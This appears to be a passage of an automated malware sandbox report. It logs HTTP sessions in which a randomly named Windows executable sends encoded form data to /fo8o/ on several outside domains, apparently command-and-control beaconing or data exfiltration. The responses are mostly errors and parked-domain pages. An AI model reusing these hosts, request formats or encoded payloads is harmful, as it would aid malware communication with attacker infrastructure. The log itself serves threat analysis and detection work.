Jan 8, 2025 14:59:56.691610098 CET | 1838 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1242
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm=[TRUNCATED]
Jan 8, 2025 14:59:57.561166048 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 08 Jan 2025 13:59:57 GMT
Connection: close
Content-Length: 315
Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49967 | 116.50.37.244 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 14:59:59.222978115 CET | 522 | OUT | GET /fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.goldenjade-travel.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 8, 2025 15:00:00.101052999 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 08 Jan 2025 13:59:59 GMT
Connection: close
Content-Length: 315
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49981 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe

Timestamp: Jan 8, 2025 15:00:13.381917000 CET | Bytes transferred: 780 | Direction: OUT | Data:
POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49982 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe

Timestamp: Jan 8, 2025 15:00:15.923553944 CET | Bytes transferred: 800 | Direction: OUT | Data:
POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49983 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe

Timestamp: Jan 8, 2025 15:00:18.457041979 CET | Bytes transferred: 1817 | Direction: OUT | Data:
POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1242
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm= [TRUNCATED]


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49984 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe

Timestamp: Jan 8, 2025 15:00:20.987472057 CET | Bytes transferred: 515 | Direction: OUT | Data:
GET /fo8o/?Dvh=YnI07v&Ubhdm=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.magmadokum.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Timestamp: Jan 8, 2025 15:01:21.691230059 CET | Bytes transferred: 194 | Direction: IN | Data:
HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49985 | Destination IP: 91.195.240.94 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe

Timestamp: Jan 8, 2025 15:01:26.778004885 CET | Bytes transferred: 783 | Direction: OUT | Data:
POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.rssnewscast.com
Origin: http://www.rssnewscast.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Referer: http://www.rssnewscast.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=

Timestamp: Jan 8, 2025 15:01:27.421096087 CET | Bytes transferred: 707 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
date: Wed, 08 Jan 2025 14:01:27 GMT
content-type: text/html
content-length: 556
server: Parking/1.0
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49986 | Destination IP: 91.195.240.94 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe

Timestamp: Jan 8, 2025 15:01:29.317349911 CET | Bytes transferred: 803 | Direction: OUT | Data:
POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.rssnewscast.com
Origin: http://www.rssnewscast.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Referer: http://www.rssnewscast.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf

Timestamp: Jan 8, 2025 15:01:29.958038092 CET | Bytes transferred: 707 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
date: Wed, 08 Jan 2025 14:01:29 GMT
content-type: text/html
content-length: 556
server: Parking/1.0
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49987 | Destination IP: 91.195.240.94 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe

Timestamp: Jan 8, 2025 15:01:31.853368998 CET | Bytes transferred: 1820 | Direction: OUT | Data:
POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.rssnewscast.com
Origin: http://www.rssnewscast.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1242
Referer: http://www.rssnewscast.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY60M [TRUNCATED]

Timestamp: Jan 8, 2025 15:01:32.494259119 CET | Bytes transferred: 707 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
date: Wed, 08 Jan 2025 14:01:32 GMT
content-type: text/html
content-length: 556
server: Parking/1.0
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49988 | Destination IP: 91.195.240.94 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe

Timestamp: Jan 8, 2025 15:01:34.394099951 CET | Bytes transferred: 516 | Direction: OUT | Data:
GET /fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07v HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.rssnewscast.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Timestamp: Jan 8, 2025 15:01:35.281248093 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
date: Wed, 08 Jan 2025 14:01:35 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_PV5+wv71LnXvciAuCLDPFBiKp4wpq2APsqY5uwc/8XLlHR6WsGqLYRbTv8B1M8RkbCZ+XHs9pUvviN3+siXinw==
last-modified: Wed, 08 Jan 2025 14:01:35 GMT
x-cache-miss-from: parking-7df97dc48-pnr4v
server: Parking/1.0
connection: close
                                                                                    Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 50 56 35 2b 77 76 37 31 4c 6e 58 76 63 69 41 75 43 4c 44 50 46 42 69 4b 70 34 77 70 71 32 41 50 73 71 59 35 75 77 63 2f 38 58 4c 6c 48 52 36 57 73 47 71 4c 59 52 62 54 76 38 42 31 4d 38 52 6b 62 43 5a 2b 58 48 73 39 70 55 76 76 69 4e 33 2b 73 69 58 69 6e 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                    Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_PV5+wv71LnXvciAuCLDPFBiKp4wpq2APsqY5uwc/8XLlHR6WsGqLYRbTv8B1M8RkbCZ+XHs9pUvviN3+siXinw==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                    Jan 8, 2025 15:01:35.281266928 CET | 1236 | IN | Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                    Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.s
                                                                                    Jan 8, 2025 15:01:35.281281948 CET | 1236 | IN | Data Raw: 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30
                                                                                    Data Ascii: e-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sele
                                                                                    Jan 8, 2025 15:01:35.281388998 CET | 1236 | IN | Data Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b
                                                                                    Data Ascii: ]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:no
                                                                                    Jan 8, 2025 15:01:35.281404972 CET | 1236 | IN | Data Raw: 3a 39 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c
                                                                                    Data Ascii: :90%;min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/
                                                                                    Jan 8, 2025 15:01:35.281416893 CET | 1236 | IN | Data Raw: 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65
                                                                                    Data Ascii: barchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-dec
                                                                                    Jan 8, 2025 15:01:35.281435013 CET | 1236 | IN | Data Raw: 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d
                                                                                    Data Ascii: tainer-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#555}.container-contact-us{text-align:center}.container-contact-us__conten
                                                                                    Jan 8, 2025 15:01:35.281539917 CET | 1236 | IN | Data Raw: 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 30 2c 32 30 30 2c 32 30 30 2c 2e 37 35 29 3b 74 6f 70 3a 30 3b
                                                                                    Data Ascii: }.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:15
                                                                                    Jan 8, 2025 15:01:35.281714916 CET | 1236 | IN | Data Raw: 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39
                                                                                    Data Ascii: r-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--second
                                                                                    Jan 8, 2025 15:01:35.281728029 CET | 1236 | IN | Data Raw: 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6f
                                                                                    Data Ascii: Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:0;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"sing
                                                                                    Jan 8, 2025 15:01:35.286946058 CET | 1236 | IN | Data Raw: 22 2c 22 70 75 73 22 3a 22 73 65 73 3d 59 33 4a 6c 50 54 45 33 4d 7a 59 7a 4e 44 51 34 4f 54 55 6d 64 47 4e 70 5a 44 31 33 64 33 63 75 63 6e 4e 7a 62 6d 56 33 63 32 4e 68 63 33 51 75 59 32 39 74 4e 6a 63 33 5a 54 67 31 4d 32 59 79 4f 57 4a 6c 4d
                                                                                    Data Ascii: ","pus":"ses=Y3JlPTE3MzYzNDQ4OTUmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjc3ZTg1M2YyOWJlMzYuMzMxODA2MjQmdGFzaz1zZWFyY2gmZG9tYWluPXJzc25ld3NjYXN0LmNvbSZhX2lkPTMmc2Vzc2lvbj1hMTdsYVdadnJsdUI2YU5MSl9zaQ==","postActionParameter":{"feedback":"/search/fb.ph


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    13 | 192.168.2.5 | 49989 | 66.29.149.46 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:01:48.669852018 CET | 783 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
